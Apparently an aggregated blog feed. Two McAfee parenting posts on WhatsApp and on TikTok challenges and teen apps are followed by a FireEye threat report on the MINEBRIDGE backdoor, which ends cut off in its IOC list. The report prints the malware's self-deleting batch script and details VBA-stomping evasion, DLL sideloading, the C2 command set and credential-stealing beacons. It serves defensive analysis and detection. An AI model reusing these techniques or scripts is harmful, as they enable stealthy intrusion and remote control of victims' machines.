We may be talking about the TikTok app in our public circles, but there’s another app — just as widely used — that kids are hoping parents’ won’t ask too many questions about. That’s because they can use the messaging app WhatsApp to talk privately with friends, exchange content and videos, and (hopefully) fly under the parentals’ radar.

What is WhatsApp?

WhatsApp is a downloadable app that uses your phone’s internet connection (wifi) to send messages, photos, videos, or files. It also allows users to make real-time video calls (much like iOS’ FaceTime). The big perk: WhatsApp can be used by connecting to any wifi so users can avoid using up minutes or texting fees. If you travel internationally, using WhatsApp is a popular way to avoid expensive international calling charges.

Why do kids love WhatsApp?

It’s easy, it’s fun, it’s free. WhatsApp Messenger lets kids send text messages, videos, photos, and audio messages as well as make video calls to friends without message limits or fees. Oh, and so far, it’s ad free, which is a plus.

It’s a stealth chatting app. WhatsApp is a popular way to create group chats (up to 256 people) that parents won’t necessarily think to check. Often kids will meet someone on one app such as Snapchat or Instagram and move to WhatsApp because they feel its less public and less regulated by parents. Like any other app, it can also be hidden behind decoy or vault apps to avoid detection.

WhatsApp web
You can’t miss the bright green WhatsApp icon on your child’s phone or in the desktop application folder. ©WhatsApp

It has cool features. WhatsApp has a broadcast feature that allows a user to send out a message to a group of people that can then only respond to the sender. The Status Feature enables users to send disappearing photos, videos, and GIFs, much like the fun features on Instagram and Snapchat.

WhatsApp hacks keep it fun. Kids love workarounds and cool functionality hacks they can use to enhance their WhatsApp experience. WhatsApp hacks can be found online with a quick Google search. Hacks help users understand how to do fun things such as schedule messages, create fake conversations, retrieve deleted messages, turn off Read receipts, make a Broadcast List, and formatting hacks that will help their account stand out.

There’s a perception of secrecy/security. WhatsApp has end-to-end encryption built-in, which means any texts, photos, or videos exchanged between users are encrypted (scrambled code) and assumed to be secure between the people communicating. WhatsApp has set itself apart from other chat apps in this area. No server stores messages after they are delivered. Not even WhatsApp can read, view, or listen to the chats, which gives users a sense of privacy and security. However, as we are reminded daily, WhatsApp, like every app is vulnerable to hacks, scams, and breaches.

What are the risks?

Inappropriate, secretive content. As with any app, the biggest concern is in the way kids and others use the app. WhatsApp (like any messaging app) allows anyone to create an account. Kids can be exposed to inappropriate content and exchange inappropriate content with others. As with any app, kids will also use acronyms or slang to hide risky behavior.

Strangers. A lot of people use WhatsApp, including those with harmful intentions. Users may assume group chats are closed to strangers since group members need a digital link to join. However, group chat links can be copied by group members and shared with anyone who can then click and join without any vetting.

Cyberbullying. Group texts are a big reason kids use WhatsApp. They can have groups as large as 250 kids. So, if a rumor, mean comment is shared or conflict erupts, situations can get intense very quickly and easily spill beyond the WhatsApp environment.

Privacy. While kids believe WhatsApp safely encrypt conversations, it does not protect them from people taking and sharing screenshots. Private discussions and photos can also be downloaded. Another threat to privacy is the way the app itself collects data of its users, which can be reviewed in its Privacy Policy and User Data section.

Scams and malware. WhatsApp is not immune to the typical scams that target social apps. The Facebook-owned app has had issues with spyware, catfishing, phishing, money requests, and fraudulent job opportunities — all in a quest to get users to hand over their personal information or assets.

Fake news. Because WhatsApp allows a user to chat in a group of up to 250 people, it’s easy for information to go viral quickly, even that information isn’t accurate. More recently, fake news originated on WhatsApp that incited panic around Coronavirus conspiracies and the 2018 mob killing in India.

Family Safety Tips

WhatsApp web
The WhatsApp interface. ©WhatsApp

Download and discuss the app. WhatsApp is easy to download and understand (simple texting interface). Once you know the basics, discuss the pros and cons of WhatsApp with your child. Ask your child to walk you through his or her app to show you how they use it.

Some questions to consider asking might be:

What do you like most about WhatsApp?
What kind of group chats are you a part of?
What kind of media do you mostly receive and send?
Are there any people in your group chats you don’t know?
Are your location and account settings as secure as they can be?
Have you shared personal information or your phone number?
Has any situation made you feel uncomfortable while on the app?

Guide younger users. For younger children or new WhatsApp users (age requirement is 13), consider creating a private WhatsApp group just for your family. Teach your kids to create a safe profile, maximize safety features, block strangers, report bullying, and how to safely share pictures, videos, and communicate. Use this time, teach them the upside of the app and the risks.

Monitor devices, screen time, and behavior. There are a lot of issues to consider and pay attention to when your kids use messaging apps. First, to monitor content, consider security software as well as filtering software. Second, pay attention to screen time and your child’s ability to balance technology use. Third, monitor behavior. Messaging apps connect kids to groupthink, a variety of content, and several emotional danger zones. Technology monitoring includes paying particular attention to your child’s emotional and physical health, friend groups, academic performance, and sleep habits.

Talk about privacy settings. Encourage your child to maximize settings and use the two-step verification option that allows a custom PIN for security against breaches and hacks. Privacy settings will allow users to choose Everyone, My Contacts, and Nobody. Review profile information and omit any personal information (age, phone number, other account links, school name, hometown).

Control location sharing. When location sharing is turned on, the images your child shares on WhatsApp will also show his or her exact location when the photo was taken. Be aware of this and consider keeping location turned off.

Avoid strangers and strange links. Once a person outside of your child’s known circle has his or her phone number, they can send any content directly unless (and until) they are blocked. They can catfish, scam, or groom WhatsApp users. Talk with your child about the importance of only chatting with known, trusted people and to block messages from strangers. Messages from strangers could contain explicit content, malware, spam, or phishing scam.

Should your child be on WhatsApp? As long as your child is only connected to trusted people (and has some form of monitoring), this can be a relatively safe social app that echos the features of most other apps. However, every family and every child is different, and whether or not your child is allowed to use the app is a personal decision. If your child is active on the app with your approval, one way to help them navigate the danger zones is to keep the safety conversation on-going and honest. Your guidance is crucial. You’ve got this parent!

The post Is WhatsApp Safe for Kids? Here’s What Parents Need to Know appeared first on McAfee Blogs.

TikTok Challenge, Hoop App, and Other Headlines You May Have Missed

TikTok Challenge

Digital news that affects families seems to be dominating the headlines these days. To keep parents in the know, here are some of the stories you may want to give extra family discussion time to this week.

Skull Breaker Challenge Proving Unfunny 

Apps — video apps especially — can help kids tap into their creativity and give kids a critical way to connect. Where the fun can take a dangerous turn is in the way kids choose to use their technology. In this case, the poor choice is in the Skull Breaker Challenge (also called the Trip Jump Challenge), a prank resulting in some kids being hospitalized.

The prank, designed to get laughs and accumulate TikTok views, includes two kids tricking a third friend into making a dance video together. Three kids line up side by side for a planned group dance that will be videotaped and posted. As everyone jumps as planned, the two kids on either side swipe the legs out from under the middle person causing him or her to fall backward. According to reports, the prank is surfacing mainly on TikTok but also Youtube.

Safe Family Tip: Consider talking to your child about the dangers of online challenges and the risks already reported in the news. 1) Discuss the physical dangers doctors are warning the public about, including neck strain, concussion, skull fracture, long-term complications, or even death. 2) Using current news stories, explain personal responsibility and what can happen legally if your child hurts another person during a prank.

Snapchat’s Hoop App Being Called ‘Tinder for Teens’

Snapchat users (over 2.5 million in fact) are flocking to a new Tinder-like app called Hoop that interfaces with Snapchat. The developer app allows other Hoop users to swipe through other Hoop users and request to connect via their Snapchat profile name.

While the app asks a user’s age, much like other social sites, there’s no way to prove a user’s age. And, users can change their age at any time after creating an account. This type of app format can be tempting for kids who are naturally curious and seeking to meet new friends outside of their familiar social circle. There’s a potential for common issues such as catfishing, predator behavior, and inappropriate content. Kids as young as 12 can form connections with strangers. While their profile may be harmless, they can’t control the type of content that pops up on their screen from other users. Another red flag: Hoop users are rewarded with “diamonds” for sharing their Snapchat name and getting others to join Hoop, so the incentive to daily share and connect with a wide circle outside of one’s known friend group may prove tough for some kids to resist.TikTok Challenge

Safe Family Tip: While it’s challenging to stay on top of the constant array of new apps, it’s not impossible. One way to understand where your child spends his or her time online is with comprehensive monitoring software. Another way of monitoring activity is to physically check your child’s phone once a week for new app icons (see right) and take the time to talk about his or her favorite apps. Consider explaining the dangers of connecting with strangers and the real possibility that a new “cute 16-year-old” may be a predator attempting to win your child’s trust (it happens every day). Review and agree on which apps are considered safe and the expectations you have for your family’s online choices.

Another app to keep on your radar is Wink. Nearly identical to Hoop, Wink interfaces with Snapchat and is being promoted as a “new friend finder.” It has a similar “swipe” feature that connects kids to random Wink users and is currently ranked #15 in the app store.

Should phones be banned from schools?

A conversation gaining a quiet but consistent buzz is the merit of prohibiting phones from schools — a law France has enforced for two years that has parents, educators, and legislators talking. Several recent studies reveal that phone bans can lead to higher test scores, higher test grades and attention spans, and increased cognitive capacity. Some schools in the U.S. have independently taken steps to curb and ban phones in hopes of focusing on distracted students.

Proponents of phones in school say a ban would be impossible to enforce and that technology is needed to help parents stay in touch with kids during the school day, especially for emergencies. Others say phones at school are a critical part of learning and raising self-sufficient, tech-savvy students prepared for a digital workforce.

Safe Family Tip: Begin the discussion with your child about the pros and cons of devices at school. Listen closely to his or her perspective. Discuss potential device-related issues that can be amplified during the school day such as cyberbullying, group chat conflicts, sexting, gaming during class, and using devices to cheat. Review expectations such as using phones only before and after school to connect with parents.

Stay tuned in the weeks to come as we take a closer look at other apps such as TikTok and WhatsApp Messenger that — when used unwisely — can lead to some surprising risks for kids. Until then, keep the digital safety conversation humming in your home. You’ve got this, parents!

The post TikTok Challenge, Hoop App, and Other Headlines You May Have Missed appeared first on McAfee Blogs.

STOMP 2 DIS: Brilliance in the (Visual) Basics

Throughout January 2020, FireEye has continued to observe multiple targeted phishing campaigns designed to download and deploy a backdoor we track as MINEBRIDGE. The campaigns primarily targeted financial services organizations in the United States, though targeting is likely more widespread than those we’ve initially observed in our FireEye product telemetry. At least one campaign targeted South Korean organizations, including a marketing agency.

In these campaigns, the phishing documents appeared to be carefully crafted and leveraged some publicly-documented — but in our experience uncommon and misunderstood — TTPs, likely in an effort to decrease detection of the malicious documents’ macros. The actor also used a self-hosted email marketing solution across multiple campaigns. Notably, the payload delivered in these campaigns leveraged a packer previously affiliated with a commonly-tracked threat actor, an overlap that we will explore later.

This blog post will review the theme of these campaigns and their targets, the adversary’s unique tradecraft, the MINEBRIDGE C++ backdoor, some potential attribution overlaps, and importantly — the threat actor’s love of rap music.

Targeting and Lure Detail

While we first identified MINEBRIDGE samples in December, we observed our first phishing campaigns relating to this activity in early January 2020. Email addresses used to send phishing messages were associated with domains that appear to have been registered specifically for this purpose within a few weeks of the activity — and were thematically consistent with the content of the phishing messages.

Additionally, the actor(s) responsible are likely using a self-hosted email marketing solution called Acelle. Acelle adds extended email headers to messages sent via the platform in the format of X-Acelle-<variable>. The messages observed across campaigns using these TTPs have included a “Customer-Id” value matching “X-Acelle-Customer-Id: 5df38b8fd5b58”. While that field remained consistent across all observed campaigns, individual campaigns also shared overlapping “X-Acelle-Sending-Server_Id” and “X-Acelle-Campaign-Id” values. All of the messages also included a “List-Unsubscribe” header offering a link hosted at 45.153.184.84 suggesting that it is the server hosting the Acelle instance used across these campaigns. The sample table for one campaign below illustrates this data:

Timestamp

Sender

Subject

x-acelle-subscriber-id

x-acelle-sending-server-id

x-acelle-customer-id

x-acelle-campaign-id

1/7/20 16:15

info@rogervecpa.com

tax return file

25474792e6f8c

5e14a2664ffb4

5df38b8fd5b58

5e14a2664ffb4

1/7/20 15:59

info@rogervecpa.com

tax return file

22e183805a051

5e14a2664ffb4

5df38b8fd5b58

5e14a2664ffb4

1/7/20

info@rogervecpa.com

tax return file

657e1a485ed77

5e14a2664ffb4

5df38b8fd5b58

5e14a2664ffb4

1/7/20 16:05

info@rogervecpa.com

tax return file

ddbbffbcb5c6c

5e14a2664ffb4

5df38b8fd5b58

5e14a2664ffb4

The URLs requested by the malicious documents and serving the final MINEBRIDGE payloads delivered in each of these campaigns provide additional overlap across campaigns. In all observed cases, the domains used the same bullet-proof hosting service. The URI used to download the final payload was “/team/invest.php” or, in one case, “/team/rumba.php”. Perhaps the most fun overlap, however, was discovered when trying to identify additional artifacts of interest hosted at similar locations. In most cases a GET request to the parent directory of “/team/” on each of the identified domains served up the lyrics to rap group Onyx’s “Bang 2 Dis” masterpiece. We will refrain from sharing the specific verse hosted due to explicit content.

One of the more notable characteristics of this activity was the consistency in themes used for domain registration, lure content, similarities in malicious document macro content, and targeting. Since first seeing these emails, we’ve identified at least 3 distinct campaigns.

Campaign #1: January 7, 2020 – Tax Theme
  • Emails associated with this campaign used the CPA themed domain rogervecpa.com registered in late November and the subject line “Tax Return File” with IRS related text in the message body.
  • The attached payload was crafted to look like an H&R Block related tax form.
  • Observed targeting included the financial sector exclusively.

Campaign #2: January 8, 2020 – Marketing Theme
  • Emails associated with this campaign used the same CPA themed domain rogervecpa.com along with pt-cpaaccountant.com, also registered late November.
  • The subject line and message body offered a marketing partnership opportunity to the victim.
  • The attached payload used a generic theme enticing users to enable macro content.
  • Observed targeting focused on a South Korean marketing agency.

Campaign #3: January 28, 2020 – Recruiting Theme
  • Emails associated with this campaign were sent from several different email addresses, though all used the recruiting-themed domain agent4career.com which was registered on January 20, 2020.
  • The subject line and message body referenced an employment candidate with experience in the financial sector.
  • The attached payload masqueraded as the resume of the same financial services candidate referenced in the phishing email.
  • Observed targeting included the financial sector exclusively.

Quit Stepping All Over My Macros

The phishing documents themselves leverage numerous interesting TTPs including hiding macros from the Office GUI, and VBA stomping.

VBA stomping is a colloquial term applied to the manipulation of Office documents where the source code of a macro is made to mismatch the pseudo-code (hereto referred to as "p-code") of the document. In order to avoid duplicating research and wasting the reader’s time, we will instead reference the impressive work of our predecessors and peers in the industry. As an introduction to the concept, we first recommend reading the tool release blog post for EvilClippy from Outflank. The security team at Walmart has also published incredible research on the methodology. Vesselin Bontchev provides a useful open source utility for dumping the p-code from an Office document in pcodedmp. This tool can be leveraged to inspect the p-code of a document separate from its VBA source. It was adopted by the wider open source analysis toolkit oletools in order to detect the presence of stomping via comparison of p-code mnemonics vs keyword extraction in VBA source.

That is a whole lot of quality reading for those interested. For the sake of brevity, the most important result of VBA stomping as relevant to this blog post is the following:

  • Static analysis tools focusing on VBA macro source extraction may be fooled into a benign assessment of a document bearing malicious p-code.
  • When VBA source is removed, and a document is opened in a version of Office for which the p-code was not compiled to execute, a macro will not execute correctly, resulting in potential failed dynamic analysis.
  • When a document is opened under a version of Office that uses a VBA version that does not match the version of Office used to create the document, VBA source code is recompiled back into p-code.
  • When a document is opened in Office and the GUI is used to view the macro, the embedded p-code is decompiled to be viewed.

The final two points identify some interesting complications in regard to leveraging this methodology more broadly. Versioning complexities arise that toolkits like EvilClippy leverage Office version enumeration features to address. An actor’s VBA stomped document containing benign VBA source but evil p-code must know the version of Office to build the p-code for, or their sample will not detonate properly. Additionally, if an actor sends a stomped document, and a user or researcher opens the macro in the Office editor, they will see malicious code.

Our actor addressed the latter point of this complication by leveraging what we assess to be another feature of the EvilClippy utility, wherein viewing the macro source is made inaccessible to a user within Office by modifying the PROJECT stream of the document. Let’s highlight this below using a publicly available sample we attribute to our actors (SHA256: 18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e):

Document PROJECT stream:

ID="{33C06E73-23C4-4174-9F9A-BA0E40E57E3F}"
Document=ThisDocument/&H00000000
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="A3A1799F59A359A359A359A3"
DPB="87855DBBA57B887C887C88"
GC="6B69B1A794A894A86B"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

The above PROJECT stream has been modified. Within the PROJECT stream workspace, a module is referenced. However, there is no module defined. We would expect the unmodified PROJECT stream of this document prior to utilization of a tool to modify it to be as follows:

ID="{33C06E73-23C4-4174-9F9A-BA0E40E57E3F}"
Document=ThisDocument/&H00000000
Module=”Module1”
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="A3A1799F59A359A359A359A3"
DPB="87855DBBA57B887C887C88"
GC="6B69B1A794A894A86B"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
Module1=26, 26, 388, 131, Z

It is interesting to note that we initially identified this actor only performing this manipulation on their malicious documents—avoiding any versioning complexities--without actually stomping the p-code to mismatch the VBA source. This seems like an odd decision and is possibly indicative of an actor assessing what “works” for their campaigns. The above malicious document is an example of them leveraging both methodologies, as highlighted by this screenshot from the awesome publicly available web service IRIS-H Digital Forensics:

We can see that the documents VBA source is a blank Sub procedure definition. A quick glance at the p-code identifies both network- based indicators and host- based indicators we can use to determine what this sample would do when executed on the proper Office version. When we attempt to open the macro in the GUI editor, Office gets angry:

For analysts looking to identify this methodology holistically, we recommend the following considerations:

  • The GUI hiding functionality results in an altered project stream wherein a module exists, but there is no module, class, or baseclass defined in the stream. This is a potential static detection.
  • While the macro source is no longer present, there are still static strings present in Module1 in this sample which may indicate Windows APIs leveraged. This is a potential static detection.

  • Utilities like the previously mentioned oletools can do all of this detection for you. If you identify false negatives, false positives, or bugs, the open source project maintainers respond to them regularly like the superheroes that they are:

The above methodology creates questions regarding potential efficiency problems for scaling any sizable campaign using it. While tools like EvilClippy provide the means to create difficult to detect malicious documents that can potentially sneak past some dynamic and static detections, their payloads have the additional burden of needing to fingerprint targets to enable successful execution. While actors with sufficient resources and creativity can no doubt account for these requirements, it is relevant to note that detections for these methodologies will likely yield more targeted activity. In fact, tertiary review of samples employing these techniques identified unrelated activity delivering both Cobalt Strike BEACON and POSHC2 payloads.

We recently expanded our internal FireEye threat behavior tree to accommodate these techniques. At the time of publication, the authors were unable to directly map the methods – PROJECT stream manipulation and VBA stomping – to existing techniques in the MITRE ATT&CK Matrix™ for Enterprise. However, our team submitted these as contributions to the ATT&CK knowledge base prior to publication and will make additional data available for ATT&CK Sightings.

Crossing The Bridge of Khazad-dûm: The MINEBRIDGE Infection Chain

Successful detonation of the previously detailed malicious document results in creation of “uCWOncHvBb.dll” via a call to URLDownloadToFileA to the URL hxxps://marendoger[.]com/team/rumba.php. The returned MINEDOOR packed MINEBRIDGE sample is saved in the executing users AppData directory (Eg: C:\Users\username\AppData\Roaming\uCWOncHvBb.dll), and then subsequent execution of the DllRegisterServer export via invocation of “regsvr32.exe /s %AppData%\uCWOncHvBb.dll” occurs:

This will result in a ZIP file being retrieved from the URL hxxps://creatorz123[.]top/~files_tv/~all_files_m.bin using the Windows API URLDownloadToFileW. The ZIP file is written to %TEMP%, unzipped to the newly created directory %AppData%\Windows Media Player, and then deleted:

The ZIP file contains legitimate files required to execute a copy of TeamViewer, listed in the file creation area of the IOC section of this post. When a file named TeamViewer.exe is identified while unzipping, it is renamed to wpvnetwks.exe:

After completing these tasks, uCWOncHvBb.dll moves itself to %AppData%\Windows Media Player\msi.dll. The phishing macro then closes the handle to msi.dll, and calls CreateProcessA on wpvnetwks.exe, which results in the renamed TeamViewer instance side-loading the malicious msi.dll located alongside it. The malware ensures its persistence through reboot by creating a link file at %CISDL_STARTUP%\Windows WMI.lnk, which points to %AppData%\Windows Media Player\wpnetwks.exe, resulting in its launch at user logon.

The end result is a legitimate, though outdated (version 11, compiled on September 17, 2018, at 10:30:12 UTC), TeamViewer instance hijacked by a malicious sideloaded DLL (MINEBRIDGE).

MINEBRIDGE is a 32-bit C++ backdoor designed to be loaded by an older, unpatched instance of the legitimate remote desktop software TeamViewer by DLL load-order hijacking. The backdoor hooks Windows APIs to prevent the victim from seeing the TeamViewer application. By default, MINEBRIDGE conducts command and control (C2) communication via HTTPS POST requests to hard-coded C2 domains. The POST requests contain a GUID derived from the system’s volume serial number, a TeamViewer unique id and password, username, computer name, operating system version, and beacon interval. MINEBRIDGE can also communicate with a C2 server by sending TeamViewer chat messages using a custom window procedure hook. Collectively, the two C2 methods support commands for downloading and executing payloads, downloading arbitrary files, self-deletion and updating, process listing, shutting down and rebooting the system, executing arbitrary shell commands, process elevation, turning on/off TeamViewer's microphone, and gathering system UAC information.

MINEBRIDGE’s default method of communication is sending HTTPS POST requests over TCP port 443. This method of communication is always active; however, the beacon-interval time may be changed via a command. Before sending any C2 beacons, the sample waits to collect the TeamViewer generated unique id (<tv_id>) and password (<tv_pass>) via SetWindowsTextW hooks.

This specific sample continuously sends an HTTP POST request over TCP port 443 with the URI ~f83g7bfiunwjsd1/g4t3_indata.php to each host listed below until a response is received.

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top

The POST body contains the formatted string uuid=<guid>&id=<tv_id>&pass=<tv_pass>&username=<user_name>&pcname=<comp_name>&osver=<os_version>&timeout=<beacon_interval> where <guid> is a GUID derived from the system's volume serial number and formatted using the format string %06lX-%04lX-%04lX-%06lX. Additionally, the request uses the hard-coded HTTP User-Agent string "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

After a response is received, it's processed for commands. A single response may contain multiple commands. For each command executed, the sample sends an HTTPS POST request over TCP port 443 indicating success or failure. The sample responds to the commands below.

Command

Description

drun

Download and execute an executable from a URL provided in the command. File saved to %TEMP%\<32_rand_chars>.exe.

rundll_command

Download a custom XOR-encoded and LZNT1 compressed DLL from a URL provided in the command and save to %TEMP%\<32_rand_chars>. Decode, decompress, and load the DLL in memory and call its entrypoint.

update_command

Move sample file to <sample_name>.old and download a new version of itself to <sample_name> where <sample_name> is the name of this sample (i.e., msi.dll). Relaunch the hosting TeamViewer application with command-line argument COM1_. Delete <sample_name>.old.

restart_command

Relaunch the hosting TeamViewer application with command-line argument COM1_.

terminate_command

Terminate the hosting TeamViewer application.

kill_command

Create and execute the self-deleting batch script tvdll.cmd to delete all unzipped files as well as the sample file. Terminate the hosting TeamViewer application.

poweroff_command

Shutdown the system.

reboot_command

Reboot the system.

setinterval_command

Update the C2 beacon-interval time.

After executing all commands in the response, the sample sleeps for the designated C2 beacon-interval time. It repeats the process outlined above to send the next C2 beacon. This behavior repeats indefinitely.

The self-deleting batch script tvdll.cmd contains the following content where <renamed_TeamVeiwer> is the renamed TeamViewer executable (i.e., wpvnetwks.exe) and <sample_name> is the name of this sample (i.e., msi.dll).

@echo off
ping 1.1.1.1 -n 1 -w 5000 > nul
goto nosleep1
:redel1
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep1
attrib -a -h -s -r %~d0%~p0TeamViewer_Resource_en.dll
del /f /q %~d0%~p0TeamViewer_Resource_en.dll
if exist  "%~d0%~p0TeamViewer_Resource_en.dll" goto redel1
goto nosleep2
:redel2
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep2
attrib -a -h -s -r %~d0%~p0TeamViewer_StaticRes.dll
del /f /q %~d0%~p0TeamViewer_StaticRes.dll
if exist  "%~d0%~p0TeamViewer_StaticRes.dll" goto redel2
goto nosleep3
:redel3
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep3
attrib -a -h -s -r %~d0%~p0TeamViewer_Desktop.exe
del /f /q %~d0%~p0TeamViewer_Desktop.exe
if exist  "%~d0%~p0TeamViewer_Desktop.exe" goto redel3
goto nosleep4
:redel4
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep4
attrib -a -h -s -r %~d0%~p0TeamViewer.ini
del /f /q %~d0%~p0TeamViewer.ini
if exist  "%~d0%~p0TeamViewer.ini" goto redel4
goto nosleep5
:redel5
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep5
attrib -a -h -s -r %~d0%~p0<sample_name>
del /f /q %~d0%~p0<sample_name>
if exist  "%~d0%~p0<sample_name>" goto redel5
goto nosleep6
:redel6
ping 1.1.1.1 -n 1 -w 750 > nul
:nosleep6
attrib -a -h -s -r %~d0%~p0<renamed_TeamVeiwer>
del /f /q %~d0%~p0<renamed_TeamVeiwer>
if exist  "%~d0%~p0<renamed_TeamViewer>" goto redel6
attrib -a -h -s -r %0
del /f /q %0

Possible Connection to Another Intrusion Set

The identified MINEBRIDGE samples have been packed within a loader we call MINEDOOR. Since Fall 2019, we’ve observed a group publicly tracked as TA505 conducting phishing campaigns that use MINEDOOR to deliver the FRIENDSPEAK backdoor. The combination of MINEDOOR and FRIENDSPEAK has also been publicly discussed using the name Get2.

The limited overlap in tactics, techniques, and procedures (TTPs) between campaigns delivering MINEBRIDGE and those delivering FRIENDSPEAK may suggest that MINEDOOR is not exclusive to TA505. Recent campaigns delivering FRIENDSPEAK have appeared to use spoofed sender addresses, Excel spreadsheets with embedded payloads, and campaign-specific domains that masquerade as common technology services. Meanwhile, the campaigns delivering MINEBRIDGE have used actor-controlled email addresses, malicious Word documents that download payloads from a remote server, and domains with a variety of themes sometimes registered weeks in advance of the campaign. The campaigns delivering MINEBRIDGE also appear to be significantly smaller in both volume and scope than the campaigns delivering FRIENDSPEAK. Finally, we observed campaigns delivering MINEBRIDGE on Eastern Orthodox Christmas when Russian-speaking actors are commonly inactive; we did not observe campaigns delivering FRIENDSPEAK during the week surrounding the holiday and language resources in the malware may suggest TA505 actors speak Russian.

It is plausible that these campaigns represent a subset of TA505 activity. For example, they may be operations conducted on behalf of a specific client or by a specific member of the broader threat group. Both sets of campaigns used domains that were registered with Eranet and had the registrant location “JL, US” or “Fujian, CN,” however this overlap is less notable because we suspect that TA505 has used domains registered by a service that reuses registrant information.

Post-compromise activity would likely reveal if these campaigns were conducted by TA505 or a second threat group, however, FireEye has not yet observed any instances in which a host has been successfully compromised by MINEBRIDGE. As such, FireEye currently clusters this activity separately from what the public tracks as TA505.

Acknowledgments

FireEye would like to thank all the dedicated authors of open source tooling and research referenced in this blog post. Further, FireEye would like to thank TeamViewer for their collaboration with us on this matter. The insecure DLL loading highlighted in this blog post was resolved in TeamViewer 11.0.214397, released on October 22, 2019, prior to the TeamViewer team receiving any information from FireEye. Additionally, TeamViewer is working to add further mitigations for the malware’s functionality. FireEye will update this post with further data from TeamViewer when this becomes available.

Indicators of Compromise (IOCs)

Suspicious Behaviors
  • Process lineage: Microsoft Word launching TeamViewer
  • Directory Creation: %APPDATA%\Windows Media Player
  • File Creation:
    • %APPDATA%\Windows Media Player\msi.dll
    • %APPDATA%\Windows Media Player\msi.dll.old
    • %APPDATA%\Windows Media Player\tvdll.cmd
    • %APPDATA%\Windows Media Player\wpvnetwks.exe
    • %APPDATA%\Windows Media Player\TeamViewer_Resource_en.dll
    • %APPDATA%\Windows Media Player\TeamViewer_StaticRes.dll
    • %APPDATA%\Windows Media Player\TeamViewer_Desktop.exe
    • %APPDATA%\Windows Media Player\TeamViewer.ini
    • %CSIDL_STARTUP%\Windows WMI.lnk
    • %CSIDL_PROFILE%\<dll_name>.xpdf
    • %TEMP%\<32 random characters>
    • %TEMP%\<32 random characters>.exe
    • %TEMP%\~8426bcrtv7bdf.bin
  • Network Activity:
    • HTTPS Post requests to C2 URLs
    • User-Agent String: "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

C2 Domains

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top
Download Domains
  • neurogon[.]com
  • tiparcano[.]com
  • seigortan[.]com
  • marendoger[.]com
  • badiconreg[.]com
Sender Domains
  • pt-cpaaccountant[.]com
  • rogervecpa[.]com
  • agent4career[.]com
  • bestrecruitments[.]com
Phishing Documents

MD5

SHA256

01067c8e41dae72ce39b28d85bf923ee

80e48391ed32e6c1ca13079d900d3afad62e05c08bd6e929dffdd2e3b9f69299

1601137b84d9bebf21dcfb9ad1eaa69d

3f121c714f18dfb59074cbb665ff9e7f36b2b372cfe6d58a2a8fb1a34dd71952

1c883a997cbf2a656869f6e69ffbd027

de7c7a962e78ceeee0d8359197daeb2c3ca5484dc7cf0d8663fb32003068c655

2ed49bd499c9962e115a66665a6944f6

b8f64a83ad770add6919d243222c62471600e64789264d116c560b7c574669ec

3b948368fe1a296f5ed18b11194ce51c

999d4f434bbc5d355656cc2a05982d61d6770a4c3c837dd8ec6aff8437ae405a

4148281424ff3e85b215cd867746b20c

9812123d2367b952e68fa09bd3d1b3b3db81f0d3e2b3c03a53c21f12f1f4c889

54f22fbc84f4d060fcbf23534a02e5f6

7b20e7e4e0b1c0e41de72c75b1866866a8f61df5a8af0ebf6e8dbd8f4e7bdc57

5a3d8348f04345f6687552e6b7469ac1

77a33d9a4610c4b794a61c79c93e2be87886d27402968310d93988dfd32a2ccf

607d28ae6cf2adb87fcb7eac9f9e09ab

f3917832c68ed3f877df4cd01635b1c14a9c7e217c93150bebf9302223f52065

9ba3275ac0e65b9cd4d5afa0adf401b4

18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e

9becd2fd73aa4b36ad9cd0c95297d40b

30025da34f6f311efe6b7b2c3fe334f934f3f6e6024e4d95e8c808c18eb6de03

9cce3c9516f0f15ce18f37d707931775

bf0adb30ca230eee6401861e1669b9cfeaa64122cc29c5294c2198f2d82f760e

9faf9e0c5945876c8bad3c121c91ea15

88c4019e66564ad8c15b189b903276910f9d828d5e180cac30f1f341647278fc

a37e6eeb06729b6108649f21064b16ef

e895dc605c6dcaf2c3173b5ec1a74a24390c4c274571d6e17b55955c9bd48799

ab8dc4ba75aad317abb8ee38c8928db0

212793a915bdd75bede8a744cd99123e2a5ac70825d7b2e1fc27104276a3aafd

b8817253288b395cb33ffe36e0072dc9

ba013420bd2306ecb9be8901db905b4696d93b9674bd7b10b4d0ef6f52fbd069

cb5e5d29f844eb22fecaa45763750c27

4ff9bfde5b5d3614e6aa753cacc68d26c12601b88e61e03e4727ee6d9fe3cdc2

cffda37453e1a1389840ed6ebaef1b0d

c9f6ba5368760bf384399c9fd6b4f33185e7d0b6ea258909d7516f41a0821056

dc0e1e4ec757a777a4d4cc92a8d9ef33

ac7e622e0d1d518f1b002d514c348a60f7a7e7885192e28626808a7b9228eab6

e5c7e82670372e3cf8e8cab2c1e6bc17

eba3c07155c47a47ee4d9b5201f47a9473255f4d7a6590b5c4e7b6e9fc533c08

f93062f6271f20649e61a09c501c6c92

3f4f546fba4f1e2ee4b32193abcaaa207efe8a767580ab92e546d75a7e978a0b

MINEBRIDGE/MINEDOOR Samples

MD5

SHA256

05432fc4145d56030f6dd6259020d16c

182ccc7f2d703ad732ffee0e1d9ae4ae5cf6b8817cc33fd44f203d31868b1e97

0be9911c5be7e6dfeaeca0a7277d432b

